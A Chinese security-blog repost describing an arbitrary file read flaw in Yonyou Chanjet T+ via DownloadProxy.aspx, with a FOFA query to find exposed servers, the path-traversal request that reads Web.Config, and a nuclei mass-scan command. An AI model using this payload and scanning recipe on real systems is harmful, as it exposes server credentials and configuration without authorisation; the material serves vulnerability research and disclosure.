用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 nuclei

admin 2022年9月21日23:45:06安全文章评论9 views898字阅读2分59秒阅读模式
用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 nuclei
文章声明

安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转载私信联系。



用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 nuclei


漏洞简介

用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件



漏洞影响

友 畅捷通

fofa: 
    app="畅捷通-TPlus"


漏洞复现


登录界面

用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 nuclei

存在漏洞的地址

/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config

用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 nuclei



nuclei-pocs

nuclei -t yonyou_changjietong_readfile_DownloadProxy.yaml -l url.txt

公众号回复0921获取

用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 nuclei




用友漏洞待更新记录

  • 用友 U8 OA test.jsp SQL注入漏洞

  • 用友nc v6.5 远程命令执行漏洞 CNVD-2021-30167

  • 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

  • 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

  • 用友 NCCloud FS文件管理SQL注入

  • 用友 NC NCFindWeb 任意文件读取漏洞

  • 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞

  • 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923

  • 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

  • 用友 ERP-NC NCFindWeb 目录遍历漏洞

  • 用友nc v6.5 反序列化漏洞 补丁绕过

  • 用友nc v6.5 反序列化漏洞

  • 用友nc v6.5 反射型xss

  • 用友nc v6.5 前台任意文件上传漏洞

  • (CNVD-2021-37786)用友nc Cloud FS 文件管理系统 任意账户登录漏洞

  • 用友 GRP-u8 前台存在任意文件上传漏洞

  • 用友nc IUFO v5.3 反射型xss

  • 用友nc 控制台绕过漏洞

  • 用友nc 数据库密码解密




原文始发于微信公众号(北极星sec):用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 nuclei

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月21日23:45:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 nuclei http://cn-sec.com/archives/1309844.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: